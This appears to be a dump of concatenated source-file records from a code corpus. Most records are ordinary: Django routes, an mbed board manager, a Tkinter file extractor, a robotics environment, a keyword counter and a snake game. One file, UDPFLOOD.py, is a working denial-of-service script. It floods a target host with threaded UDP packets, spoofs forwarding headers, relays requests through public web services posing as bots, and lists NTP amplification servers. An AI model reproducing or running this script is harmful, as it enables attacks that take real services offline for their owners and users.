{"seq_id":"187051009","text":"\"\"\"Realproperty URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import:  from my_app import views\n    2. Add a URL to urlpatterns:  path('', views.home, name='home')\nClass-based views\n    1. Add an import:  from other_app.views import Home\n    2. Add a URL to urlpatterns:  path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom Admin import views as ad\nfrom User import views as us\nurlpatterns = [\n # Admin\n path('admin/', admin.site.urls),\n path('admin-login', ad.login),\n path('admin-login-form/', ad.login_form),\n path('admin-register', ad.register),\n path('admin-register-form/', ad.register_form),\n path('Dashboard/', ad.dashboard),\n path('subscriptio-view-form/', ad.subscriptio_view_form),\n path('submit-subscription-plan', ad.submit_subscription_plan),\n\n # User\n path('', us.index),\n path('user-login', us.user_login_check),\n path('home/', us.home),\n path('sell-property/', us.sell_property),\n path('new-post-form/', us.new_post_form),\n path('property-details-submit', us.property_details_submit),\n path('location-details-submit', us.location_details_submit),\n path('resale-details-submit', us.resale_details_submit),\n path('amenities-submit', us.amenities_submit),\n path('additional-information-submit', us.additional_information_submit),\n path('Schedule-information-submit', us.Schedule_information_submit),\n\n]\n","sub_path":"Realproperty/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"503724141","text":"from __future__ import absolute_import\n\nimport json\nimport os, sys, re\nimport threading\nfrom time import sleep, time\n\nfrom daemon.logger import info, error, warning\nfrom daemon.event_producers.serial_port import serial_connect,\\\n serial_listen,\\\n serial_reset,\\\n get_com_port\n\n\n\n'''\nThis is a list of MbedBoard\n'''\nclass MbedBoards(list):\n\n def get_board(self, board):\n for b in self:\n if board['id'] == b.id:\n return b\n\n def get_board_by_id(self, id):\n for b in self:\n if b.id == id:\n return b\n\n def clone(self):\n return self[:]\n\n def get_ids(self):\n return [b.id for b in self]\n\n def get_connected(self):\n return [b.id for b in self if b.is_connected]\n\n\n\n'''\nRepresentation of an mbed board. This class should be instantiated by any event\nthat implies that an mbed board has been connected. The ID can be the hardware serial ID\nof the board or something made up by the event producers.\n'''\nclass MbedBoard():\n\n def __init__(self, board_info):\n\n assert isinstance(board_info, dict)\n assert 'id' in board_info\n val_or_none = lambda key, d: d[key] if key in d else None\n\n self.id = board_info['id']\n self.serial_id = val_or_none('serial_id', board_info)\n self.dev = val_or_none('dev', board_info)\n self.mnt = val_or_none('mnt', board_info)\n self.com = val_or_none('com', board_info)\n self.model = get_board_model(board_info)\n\n self.resettable = False\n self.mounted = False\n self.connected = True\n\n\n @property\n def info(self):\n return {\n 'id' : self.id,\n 'serial_id' : self.serial_id,\n 'dev' : self.dev,\n 'mnt' : self.mnt,\n 'com' : self.com,\n 'resettable' : self.resettable,\n 'connected' : self.connected,\n 'mounted' : self.mounted,\n 'model' : self.model\n }\n\n def reset(self):\n return serial_reset(self)\n\n def is_connected(self):\n return self.connected\n\n def add_file(self, fpath, fcontent):\n if self.mounted:\n f = open(self.mnt+'/'+fpath, 'w')\n f.write(fcontent)\n f.close()\n return True\n else:\n warning('Not mounted. 
Can\\'t copy file to board.')\n return False\n\n '''\n Sets up everything needed for serial communication with the device.\n A handler is needed since a separate thread needs to do everything since\n we want to avoid blocking (namely we need timeout because of serial problems).\n '''\n def start_serial_handler(self):\n if not self.com:\n self.com = get_com_port(self.serial_id)\n def handler():\n connected = serial_connect(self)\n if connected:\n serial_listen(self)\n t = threading.Thread(target=handler)\n t.daemon = True\n t.start()\n\n def update(self, info):\n pass\n\n\n\n# --------------------------- Board model ------------------------------\n\n# Models are specified by the four first digits in the serial id of the device\nunofficial_models = {\n '1549' : 'LPC1549 Xpresso v2',\n 'A000' : 'NXP LPC1768',\n '066E' : 'Nucleo F401RE',\n '0672' : 'Nucleo F302R8'\n}\n\nofficial_models = {\n '1010' : 'NXP LPC1768',\n '1040' : 'LPC11U24',\n '9004' : \"LPC1768\",\n '0200' : 'KL25Z',\n '0210' : 'KL05Z',\n '0220' : 'KL46Z',\n '0230' : 'K20D50M',\n '0231' : 'K22F',\n '0240' : 'K64F',\n '0250' : 'KL02Z',\n '0260' : 'KL26Z',\n '9004' : 'LPC1768',\n '1050' : 'LPC800',\n '1070' : 'NRF51822',\n '1080' : 'STM32F103RC',\n '1090' : 'STM32F051',\n}\n\n\n\ndef get_board_model(board_info):\n if 'serial_id' in board_info and board_info['serial_id']:\n prefix = board_info['serial_id'][0:4]\n if prefix in official_models:\n return official_models[prefix]\n if prefix in unofficial_models:\n return unofficial_models[prefix]\n return None\n","sub_path":"daemon/mbedboard.py","file_name":"mbedboard.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"303099048","text":"# listings.py/pyc\n# ---\n# Benjamin Williams\n# <eeu222@bangor.ac.uk>\n# \n#\n\nimport sys\nimport json\nfrom os import listdir\nfrom os.path import isfile, join\n\nlowPath = \"scrn/dense/low\";\nmediumPath = \"scrn/dense/medium\";\nhighPath = \"scrn/dense/high\";\n\nlowDensityFiles = [ f for f in listdir(lowPath) if isfile(join(lowPath,f)) ];\nmediumDensityFiles = [ f for f in listdir(mediumPath) if isfile(join(mediumPath,f)) ];\nhighDensityFiles = [ f for f in listdir(highPath) if isfile(join(highPath,f)) ];\n\noutputData = {\n\t\"low\" : [ \"scrn/dense/low/\" + x for x in lowDensityFiles ],\n\t\"medium\" : [ \"scrn/dense/medium/\" + x for x in mediumDensityFiles ],\n\t\"high\" : [ \"scrn/dense/high/\" + x for x in highDensityFiles ],\n};\n\nencodedData = json.JSONEncoder().encode(outputData);\n\nprint(encodedData);\nfp = open('snapshot.json', 'w+');\nfp.write(json.JSONEncoder().encode(outputData));\nfp.close();","sub_path":"listings.py","file_name":"listings.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"30972151","text":"from . 
import Reasoner\n\n\"\"\"\nBenefit: JobSeeker Support (eligibility):\nIf applicant.employmentStatus ≠ \"full-time\"\n and 18 ≤ applicant.Age\n and applicant.isNZResident\n and applicant.hasLivedInNZfor2Years\n and applicant.normallyLivesInNZ\n and income.ofApplicantAndSpouse < 570\n and recipient.prepareForEmployment\n then benefit.isJobSeekerSupport is PERMITTED\n\"\"\"\n\n\nclass TestJobSeekerSupport(Reasoner):\n key = 'isJobSeekerSupport'\n\n body = {\n \"applicant\": {\n \"employmentStatus\": \"part-time\",\n \"Age\": 18,\n \"hasLivedInNZfor2Years\": True,\n \"isNZResident\": True,\n \"normallyLivesInNZ\": True\n },\n \"income\": {\n \"ofApplicantAndSpouse\": 550\n },\n \"recipient\": {\n \"prepareForEmployment\": True\n }\n }\n\n def test_reasoning(self):\n self.assertTrue(self.is_conclusive)\n self.assertTrue(self.is_permitted)\n","sub_path":"pytests/test_job_seeker_support.py","file_name":"test_job_seeker_support.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"262458229","text":"\n__author__=\"rojin.varghese\"\n__date__ =\"$Dec 10, 2013 1:46:18 PM$\"\n\nfrom xlrd import open_workbook\nimport re\nfrom xlrd import open_workbook\nimport xlwt\n\n\ncall_id = [];\nkeywordfound = [];\ntemp = []\n\nbook = open_workbook('C:/Documents and Settings/rojin.varghese/Desktop/LargeTest/Total.xls')\nsheet = book.sheet_by_index(0)\n\nbook1 = open_workbook('C:/Documents and Settings/rojin.varghese/Desktop/LargeTest/Keywords.xls')\nsheet1 = book1.sheet_by_index(0)\n\nfor j in range(sheet.nrows):\n line = sheet.cell_value(j,0)\n call_id.append(line);\n line = sheet.cell_value(j,1)\n line = re.sub('[-*>]', '', line)\n line = re.sub('[\\n]', '', line)\n line = line.lower()\n\n for i in range(4):\n line1 = sheet1.cell_value(i,0)\n line1 = line1.lower()\n line1 = re.split(', ', line1)\n\n for x in line1:\n a = len(line)\n b = len(line.replace(x , \"\"))\n c = len(x)\n if (a-b) != 0:\n keywords = (a - b)/c\n keywordfound.append((i,0,j,x,keywords))\n\n line2 = sheet1.cell_value(i,1)\n line2 = line2.lower()\n line2 = re.split(', ', line2)\n\n for x in line2:\n a = len(line)\n b = len(line.replace(x , \"\"))\n c = len(x)\n if (a-b) != 0:\n keywords = (a - b)/c\n keywordfound.append((i,1,j,x,keywords))\n\n line3 = sheet1.cell_value(i,2)\n line3 = line3.lower()\n line3 = re.split(', ', line3)\n\n for x in line3:\n a = len(line)\n b = len(line.replace(x , \"\"))\n c = len(x)\n if (a-b) != 0:\n keywords = (a - b)/c\n keywordfound.append((i,2,j,x,keywords))\n\n line4 = sheet1.cell_value(i,3)\n line4 = line4.lower()\n line4 = re.split(', ', line4)\n\n for x in line4:\n a = len(line)\n b = len(line.replace(x , \"\"))\n c = len(x)\n if (a-b) != 0:\n keywords = (a - b)/c\n keywordfound.append((i,3,j,x,keywords))\n\n line5 = sheet1.cell_value(i,4)\n line5 = line5.lower()\n line5 = re.split(', ', line5)\n\n for x in line5:\n a = len(line)\n b = len(line.replace(x , \"\"))\n c = len(x)\n if (a-b) != 0:\n keywords = (a - b)/c\n keywordfound.append((i,4,j,x,keywords))\n\n\nbook2 = xlwt.Workbook()\nsh1 = book2.add_sheet(\"Catg_TypeA\")\nsh2 = book2.add_sheet(\"Catg_TypeB\")\nsh3 = book2.add_sheet(\"Catg_TypeC\")\nsh4 = book2.add_sheet(\"Catg_TypeD\")\nsh5 = book2.add_sheet(\"Catg_TypeE\")\nsh6 = book2.add_sheet(\"Mastr_TypeA\")\nsh7 = book2.add_sheet(\"Mastr_TypeB\")\nsh8 = book2.add_sheet(\"Mastr_TypeC\")\nsh9 = book2.add_sheet(\"Mastr_TypeD\")\nsh10 = book2.add_sheet(\"Mastr_TypeE\")\nsh11 = 
book2.add_sheet(\"call_TypeA\")\nsh12 = book2.add_sheet(\"call_TypeB\")\nsh13 = book2.add_sheet(\"call_TypeC\")\nsh14 = book2.add_sheet(\"call_TypeD\")\nsh15 = book2.add_sheet(\"call_TypeE\")\nsh16 = book2.add_sheet(\"Subcall_TypeA\")\nsh17 = book2.add_sheet(\"Subcall_TypeB\")\nsh18 = book2.add_sheet(\"Subcall_TypeC\")\nsh19 = book2.add_sheet(\"Subcall_TypeD\")\nsh20 = book2.add_sheet(\"Subcall_TypeE\")\n\nr1 = r2 = r3 = r4 = r5 = r6 = r7 = r8 = r9 = r10 = 0\nr11 = r12 = r13 = r14 = r15 = r16 = r17 = r18 = r19 = r20 = 0\n\nfor a,b,c,d,e in keywordfound:\n\n if a == 0:\n\n if b == 0:\n sh1.write(r1, 0, d)\n sh1.write(r1, 1, e)\n sh1.write(r1, 2, c)\n r1 = r1+1\n elif b == 1 :\n sh2.write(r2, 0, d)\n sh2.write(r2, 1, e)\n sh2.write(r2, 2, c)\n r2 = r2+1\n elif b == 2 :\n sh3.write(r3, 0, d)\n sh3.write(r3, 1, e)\n sh3.write(r3, 2, c)\n r3 = r3+1\n elif b == 3 :\n sh4.write(r4, 0, d)\n sh4.write(r4, 1, e)\n sh4.write(r4, 2, c)\n r4 = r4+1\n elif b == 4 :\n sh5.write(r5, 0, d)\n sh5.write(r5, 1, e)\n sh5.write(r5, 2, c)\n r5 = r5+1\n book2.save(\"C:/Documents and Settings/rojin.varghese/Desktop/LargeTest/Keyword_numbes.xls\")\n elif a == 1:\n\n if b == 0:\n sh6.write(r6, 0, d)\n sh6.write(r6, 1, e)\n sh6.write(r6, 2, c)\n r6 = r6+1\n elif b == 1 :\n sh7.write(r7, 0, d)\n sh7.write(r7, 1, e)\n sh7.write(r7, 2, c)\n r7 = r7+1\n elif b == 2 :\n sh8.write(r8, 0, d)\n sh8.write(r8, 1, e)\n sh8.write(r8, 2, c)\n r8 = r8+1\n elif b == 3 :\n sh9.write(r9, 0, d)\n sh9.write(r9, 1, e)\n sh9.write(r9, 2, c)\n r9 = r9+1\n elif b == 4 :\n sh10.write(r10, 0, d)\n sh10.write(r10, 1, e)\n sh10.write(r10, 2, c)\n r10 = r10+1\n book2.save(\"C:/Documents and Settings/rojin.varghese/Desktop/LargeTest/Keyword_numbes.xls\")\n elif a == 2:\n \n if b == 0:\n sh11.write(r11, 0, d)\n sh11.write(r11, 1, e)\n sh11.write(r11, 2, c)\n r11 = r11+1\n elif b == 1 :\n sh12.write(r12, 0, d)\n sh12.write(r12, 1, e)\n sh12.write(r12, 2, c)\n r12 = r12+1\n elif b == 2 :\n sh13.write(r13, 0, d)\n sh13.write(r13, 1, e)\n sh13.write(r13, 2, c)\n r13 = r13+1\n elif b == 3 :\n sh14.write(r14, 0, d)\n sh14.write(r14, 1, e)\n sh14.write(r14, 2, c)\n r14 = r14+1\n elif b == 4 :\n sh15.write(r15, 0, d)\n sh15.write(r15, 1, e)\n sh15.write(r15, 2, c)\n r15 = r15+1\n book2.save(\"C:/Documents and Settings/rojin.varghese/Desktop/LargeTest/Keyword_numbes.xls\")\n elif a == 3 :\n\n if b == 0:\n sh16.write(r16, 0, d)\n sh16.write(r16, 1, e)\n sh16.write(r16, 2, c)\n r16 = r16+1\n elif b == 1 :\n sh17.write(r17, 0, d)\n sh17.write(r17, 1, e)\n sh17.write(r17, 2, c)\n r17 = r17+1\n elif b == 2 :\n sh18.write(r18, 0, d)\n sh18.write(r18, 1, e)\n sh18.write(r18, 2, c)\n r18 = r18+1\n elif b == 3 :\n sh19.write(r19, 0, d)\n sh19.write(r19, 1, e)\n sh19.write(r19, 2, c)\n r19 = r19+1\n elif b == 4 :\n sh20.write(r20, 0, d)\n sh20.write(r20, 1, e)\n sh20.write(r20, 2, c)\n r20 = r20+1\n\n book2.save(\"C:/Documents and Settings/rojin.varghese/Desktop/LargeTest/Keyword_numbes.xls\")\n \n\n","sub_path":"Keyword probability finder.py","file_name":"Keyword probability finder.py","file_ext":"py","file_size_in_byte":6586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"137747179","text":"import os\nfrom gym import utils\nfrom gym.envs.robotics import peg_insert_open_to_close\n\n\n# Ensure we get the path separator correct on windows\nMODEL_XML_PATH = os.path.join('fetch', 'peg_insert.xml')\n\n\nclass CamPegInsertOpenToCloseEnv(peg_insert_open_to_close.PegInsertOpenToCloseEnv, utils.EzPickle):\n def 
__init__(self, reward_type='sparse', goal_type='fixed', cam_type='fixed', gripper_init_type='fixed', act_noise=False, obs_noise=False, depth=False, two_cam=False, use_task_index=False, random_obj=False, train_random=False, test_random=False, limit_dir=False, use_close_loop=False):\n initial_qpos = {\n 'robot0:slide0': 0.405,\n 'robot0:slide1': 0.48,\n 'robot0:slide2': 0.0,\n 'object0:joint': [1.25, 0.53, 0.4, 1., 0., 0., 0.],\n }\n peg_insert_open_to_close.PegInsertOpenToCloseEnv.__init__(\n self, MODEL_XML_PATH, block_gripper=False, n_substeps=20,\n gripper_extra_height=0.5, target_in_the_air=False, target_offset=0.0,\n obj_range=0.03, target_range=0.15, distance_threshold=0.02,\n initial_qpos=initial_qpos, reward_type=reward_type, goal_type=goal_type,\n cam_type=cam_type, gripper_init_type=gripper_init_type, act_noise=act_noise, obs_noise=obs_noise, depth=depth, two_cam=two_cam, use_task_index=use_task_index, random_obj=random_obj, train_random=train_random, test_random=test_random, limit_dir=limit_dir, use_close_loop=use_close_loop)\n utils.EzPickle.__init__(self)\n","sub_path":"gym/envs/robotics/peg_insert/peg_insert_open_to_close.py","file_name":"peg_insert_open_to_close.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"375580816","text":"from tkinter import filedialog\nfrom tkinter import *\nimport shutil\nimport os\nimport datetime\nimport time\nimport argparse\nimport ftplib\n\n\n#######################################################\n#Customized version of fileextractor with Tkinter GUI.#\n#######################################################\ndef search_copy_files(source, destination, extension, logger):\n\tlogger.insert(END,\"Searching and copying files from Source: \"+source+\" to Destination: \"+destination)\n\tlogger.see(END)\n\tif not os.path.exists(destination):\n\t\tos.makedirs(destination)\n\tfor root, directories, filenames in os.walk(source):\n\t\tfor filename in filenames:\n\t\t\tif extension != None:\n\t\t\t\tif filename.endswith(extension):\n\t\t\t\t\t_copy_file(root,filename,destination,logger)\n\t\t\telse:\n\t\t\t\t_copy_file(root,filename,destination,logger)\n\tlogger.insert(END,\"Finished copying all files. 
Please check the destination folder:\"+destination+\"\\n\")\n\tlogger.see(END)\n\ndef _copy_file(root, filename, destination, logger):\n\ttry:\n\t\tshutil.copy(os.path.join(root,filename),destination)\n\texcept Exception as e:\n\t\tlogger.insert(END,e)\n\t\tlogger.see(END)\n\t\tpass\n\tfinally:\n\t\tlogger.insert(END,\"copied \"+os.path.join(destination,filename)+\"\\n\")\n\t\tlogger.see(END)\n\n#############\n#Tkinter GUI#\n#############\ndef src_button():\n\tglobal src_path\n\tfilename = filedialog.askdirectory()\n\tsrc_path.set(filename)\n\t\ndef dest_button():\n\tglobal dest_path\n\tfilename = filedialog.askdirectory()\n\tdest_path.set(filename)\n\ndef run_button():\n\tsearch_copy_files(src_path.get(),dest_path.get(),extension.get(), text)\n\n#main window\nroot = Tk()\nroot.title(\"File Extractor v1.0 | me@kunxia.com\")\nroot.geometry('700x450')\nroot.resizable(False, False)\n\n\n#source directory picker\nsrc_path = StringVar()\nsrc_path.set(\"Please choose the source directory where you want to extract file from\")\nsrcLbl = Label(master=root,textvariable=src_path, anchor='w')\nsrcLbl.grid(row=0, column=2, columnspan=3, sticky=W)\nsrcBtn = Button(text=\"Source Directory\", command=src_button)\nsrcBtn.grid(row=0, column=1)\n\n#destination directory picker\ndest_path = StringVar()\ndest_path.set(\"Please specify the output directory where you want to copy files to\")\ndestLbl = Label(master=root,textvariable=dest_path, anchor='w')\ndestLbl.grid(row=1, column=2, columnspan=5, sticky=W)\ndestBtn = Button(text=\"Output Directory\", command=dest_button)\ndestBtn.grid(row=1, column=1)\n\n#file extension input\nextension = StringVar()\nextLbl = Label(master=root,text=\"File Extension\")\nextLbl.grid(row=3, column=1,sticky=W)\nextBox = Entry(master=root, textvariable=extension)\nextBox.grid(row=3, column=2, sticky=W)\n\n#Run File Extraction\nrunBtn = Button(text=\"Extract Files\", command=run_button)\nrunBtn.grid(row=4, column=2, sticky=W)\n\n#Log output\nlog = StringVar()\ntext = Text(master=root, wrap=WORD)\ntext.tag_configure(\"center\", justify='center')\ntext.grid(row=5,column=2, columnspan=3, sticky=W)\ntext.insert(END, \"File Extrator helps you extract files from the source directory including sub-folders and save them to the output directory.\\n\")\n\nmainloop()\n\n","sub_path":"fileextractorgui.py","file_name":"fileextractorgui.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"5043688","text":"#dos script hammer\r\n#di edit dan di modifikasi daya tempurnya oleh hendrik\r\n#penambahan fitur2 baru\r\n\r\nfrom queue import Queue\r\nfrom optparse import OptionParser\r\nimport time,sys,socket,threading,logging,urllib.request,random\r\ncode = '/NCD/78hJl6TU8LKiogR'\r\ndef user_agent(): #uagent class\r\n\tglobal uagent\r\n\tuagent=[]\r\n\tuagent.append(\"Mozilla/5.0 (Linux; U; Android 4.0.3; es-es; i-Joy-Andromeda Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\")\r\n\tuagent.append(\"Mozilla/5.0 (Linux; U; Android 4.0.3; en-gb; i-Joy-Andromeda Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\") \r\n\tuagent.append(\"Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; i-Joy-Andromeda Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\")\r\n\treturn(uagent)\r\n\r\n\r\ndef my_bots(): #bot class\r\n\tglobal 
bots\r\n\tbots=[]\r\n\tbots.append(\"http://validator.w3.org/check?uri=\")\r\n\tbots.append(\"dfwdiesel.net/check?u=\")\r\n\tbots.append(\"http://host-tracker.com/check_page/?furl=\")\r\n\tbots.append(\"http://jigsaw.w3.org/css-validator/validator?uri=\")\r\n\tbots.append(\"http://www.google.com/translate?u=\")\r\n\tbots.append(\"http://www.webproxy.net/view?q=\")\r\n\tbots.append(\"http://google.com/robots.txt\")\r\n\tbots.append(\"http://host-tracker.com/check_page/?furl=\")\r\n\tbots.append(\"http://www.google.com/translate?u=\")\r\n\tbots.append(\"http://anonymouse.org/cgi-bin/anon-www.cgi/\")\r\n\tbots.append(\"http://www.onlinewebcheck.com/?url=\")\r\n\tbots.append(\"http://feedvalidator.org/check.cgi?url=\")\r\n\tbots.append(\"http://check-host.net/check-http?host=\")\r\n\tbots.append(\"http://checksite.us/?url=\")\r\n\tbots.append(\"http://jobs.bloomberg.com/search?q=\")\r\n\tbots.append(\"http://www.bing.com/search?q=\")\r\n\treturn(bots)\r\n\t\r\ndef rpcs(): #rcps class\r\n global rpcs\r\n rpcs=[]\r\n rpcs.append(\"http://missionglobal.com/xmlrpc.php\")\r\n rpcs.append(\"http://www.formpac.com/xmlrpc.php\")\r\n rpcs.append(\"http://www.tman.ca/hanas/xmlrpc.php\")\r\n rpcs.append(\"http://www.niitsuhome.com/wp/xmlrpc.php\")\r\n rpcs.append(\"https://www.e-publicrealestate.gr/xmlrpc.php\")\r\n return(rpcs)\r\n \r\ndef ntp(): #ntp class\r\n global ntp\r\n ntp=[]\r\n ntp.append(\"194.164.127.5\")\r\n ntp.append(\"216.239.35.8\")\r\n ntp.append(\"128.138.140.44\")\r\n ntp.append(\"139.78.97.128\")\r\n ntp.append(\"138.96.64.10\")\r\n ntp.append(\"200.23.51.102\")\r\n ntp.append(\"193.79.237.14\")\r\n ntp.append(\"194.58.203.20\")\r\n ntp.append(\"194.58.203.148\")\r\n ntp.append(\"208.91.196.74\")\r\n ntp.append(\"194.58.202.148\")\r\n ntp.append(\"192.36.143.151\")\r\n ntp.append(\"193.62.22.98\")\r\n ntp.append(\"192.12.19.20\")\r\n return(ntp)\r\n\r\ndef bot_hammering(url):\r\n\ttry:\r\n\t\twhile True:\r\n\t\t\treq = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))\r\n\t\t\tprint(\"\\033[94mBots Refreshing\\033[0m\")\r\n\t\t\ttime.sleep(.1)\r\n\texcept:\r\n\t\ttime.sleep(.1)\r\n\t\t\r\ndef rpcs_hammering(url):\r\n\ttry:\r\n\t\twhile True:\r\n\t\t\treq = urllib.request.urlopen(urllib.request.Request(url,headers={'X-Forwarded-For:': random.choice(rpcs)}))\r\n\t\t\tprint(\"\\033[94m[AI] OPEN NEW SESSION RPCS\")\r\n\t\t\ttime.sleep(.1)\r\n\texcept:\r\n\t\ttime.sleep(.1)\r\n\r\n\r\ndef down_it(item):\r\n\ttry:\r\n\t\twhile True:\r\n\t\t\tpacket = str(\"GET / HTTP/1.1\\nHost: \"+host+\"\\n\\n User-Agent: \"+random.choice(uagent)+\"\\n X-Forwarded-For: \"+random.choice(rpcs)+data).encode('utf-8')\r\n\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\t\t\ts.connect((host,int(port)))\r\n\t\t\tif s.sendto( packet, (host, int(port)) ):\r\n\t\t\t\ts.shutdown(1)\r\n\t\t\t\tprint (\"\\033[92m[INFO] ATTACKING FROM : \",random.choice(bots)), print(\"[AI] RPCS :\",random.choice(rpcs))\r\n\t\t\t\ttime.sleep(3) #JARAK JEDA ATTACK 3 DETIK\r\n\t\t\telse:\r\n\t\t\t\ts.shutdown(1)\r\n\t\t\t\tprint(\"\\033[91mshut<->down\\033[0m\")\r\n\t\t\ttime.sleep(.1)\r\n\texcept socket.error as e:\r\n\t\tprint(\"\\033[91m [AI] SERVER OFFLINE??\\033[0m\")\r\n\t\t#print(\"\\033[91m\",e,\"\\033[0m\")\r\n\t\ttime.sleep(.1)\r\n\r\n\r\ndef dos():\r\n\twhile True:\r\n\t\titem = q.get()\r\n\t\tdown_it(item)\r\n\t\tq.task_done()\r\n\r\n\r\ndef dos2():\r\n\twhile 
True:\r\n\t\titem=w.get()\r\n\t\tbot_hammering(random.choice(bots)+\"http://\"+host)\r\n\t\tw.task_done()\r\n\r\n\r\ndef usage():\r\n print\r\n\r\n\r\ndef get_parameters():\r\n\tglobal host\r\n\tglobal port\r\n\tglobal thr\r\n\tglobal item\r\n\toptp = OptionParser(add_help_option=False,epilog=\"Hammers\")\r\n\toptp.add_option(\"-q\",\"--quiet\", help=\"set logging to ERROR\",action=\"store_const\", dest=\"loglevel\",const=logging.ERROR, default=logging.INFO)\r\n\toptp.add_option(\"-s\",\"--server\", dest=\"host\",help=\"attack to server ip -s ip\")\r\n\toptp.add_option(\"-p\",\"--port\",type=\"int\",dest=\"port\",help=\"-p 80 default 80\")\r\n\toptp.add_option(\"-t\",\"--turbo\",type=\"int\",dest=\"turbo\",help=\"default 135 -t 135\")\r\n\toptp.add_option(\"-h\",\"--help\",dest=\"help\",action='store_true',help=\"help you\")\r\n\topts, args = optp.parse_args()\r\n\tlogging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')\r\n\tif opts.help:\r\n\t\tusage()\r\n\tif opts.host is not None:\r\n\t\thost = opts.host\r\n\telse:\r\n\t\tusage()\r\n\tif opts.port is None:\r\n\t\tport = 80\r\n\telse:\r\n\t\tport = opts.port\r\n\tif opts.turbo is None:\r\n\t\tthr = 135\r\n\telse:\r\n\t\tthr = opts.turbo\r\n\r\n\r\n# reading headers\r\nglobal data\r\nheaders = open(\"headers.txt\", \"r\")\r\ndata = headers.read()\r\nheaders.close()\r\n#task queue are q,w\r\nq = Queue()\r\nw = Queue()\r\n\r\n\r\nif __name__ == '__main__':\r\n\tif len(sys.argv) < 2:\r\n\t\tusage()\r\n\tget_parameters()\r\n\tprint(\"\\033[92m[AI] Target : \", host)\r\n\tprint(\"\\033[31;1m[AI] STARTING ATTACK...\\033[0m\")\r\n\ttime.sleep(5)\r\n\tprint(\"\\033[92mCONECTING TO RPCS : \",rpcs)\r\n\tuser_agent()\r\n\tmy_bots()\r\n\trpcs()\r\n\ttime.sleep(5)\r\n\tprint(\"NTP AMPLIFIER DEFAULD CONNECTING :\",ntp)\r\n\ttime.sleep(5)\r\n\ttry:\r\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\ts.connect((host,int(port)))\r\n\t\ts.settimeout(1)\r\n\texcept socket.error as e:\r\n\t\tprint(\"\\033[91m[AI]\",host,\"IP TIDAK DI TEMUKAN\\033[0m\")\r\n\t\tprint(\"\\033[91m[AI] BOT : OFFLINE\")\r\n\t\tprint(\"\\033[91m[AI] NTP AMPLIFIER : OFFLINE\")\r\n\t\tprint(\"\\033[91m[AI] RPCS : OFF MODE\")\r\n\t\tusage()\r\n\twhile True:\r\n\t\tprint(\"ALL TROPS CONNECTED ON 127.0.0.7 SERVER : \",socket.gethostname())\r\n\t\ttime.sleep(3)\r\n\t\tprint(\"BATLLE MODE : ON\")\r\n\t\tprint(\"ATTACK CODE : \",code)\r\n\t\ttime.sleep(3)\r\n\t\tfor i in range(int(thr)):\r\n\t\t\tt = threading.Thread(target=dos)\r\n\t\t\tt.daemon = True # if thread is exist, it dies\r\n\t\t\tt.start()\r\n\t\t\tt2 = threading.Thread(target=dos2)\r\n\t\t\tt2.daemon = True # if thread is exist, it dies\r\n\t\t\tt2.start()\r\n\t\tstart = time.time()\r\n\t\t#tasking\r\n\t\titem = 0\r\n\t\twhile True:\r\n\t\t\tif (item>1800): # for no memory crash\r\n\t\t\t\titem=0\r\n\t\t\t\ttime.sleep(.1)\r\n\t\t\titem = item + 1\r\n\t\t\tq.put(item)\r\n\t\t\tw.put(item)\r\n\t\tq.join()\r\n\t\tw.join()","sub_path":"UDPFLOOD.py","file_name":"UDPFLOOD.py","file_ext":"py","file_size_in_byte":6535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"383585395","text":"from csv import DictReader\n\ndef read(csv_file):\n try:\n try:\n return DictReader(open(csv_file))\n\n except FileNotFoundError:\n print(\"Wrong file or file path\")\n raise\n except OSError:\n print(\"Wrong type\")\n raise 
","sub_path":"Day6/test/csvdictionary_test.py","file_name":"csvdictionary_test.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"427202464","text":"import pygame\nimport snake\nimport food\nimport sys\n\n# define game play area & characteristics\nHEIGHT = 20\nWIDTH = 20\nSPEED = 5\nSPEED_TICK = 2\nSPEED_INC = 5\nSHORT = 10\n\nboundaryblock = pygame.Surface((snake.BLOCK_SIZE, snake.BLOCK_SIZE))\nboundaryblock.set_alpha(255)\nboundaryblock.fill((255, 255, 255))\n\n\ndef in_game_boundary(snake):\n head_position = snake.get_head_position()\n return not (head_position[0] < 1 or head_position[1] < 1 or\n head_position[0] >= HEIGHT + 1 or head_position[1] >= WIDTH + 1)\n\n\ndef draw_boundary(surface):\n for y in range(HEIGHT + 2):\n surface.blit(boundaryblock, (0, y * snake.BLOCK_SIZE))\n surface.blit(boundaryblock, ((WIDTH + 1) *\n snake.BLOCK_SIZE, y * snake.BLOCK_SIZE))\n\n for x in range(WIDTH + 2):\n 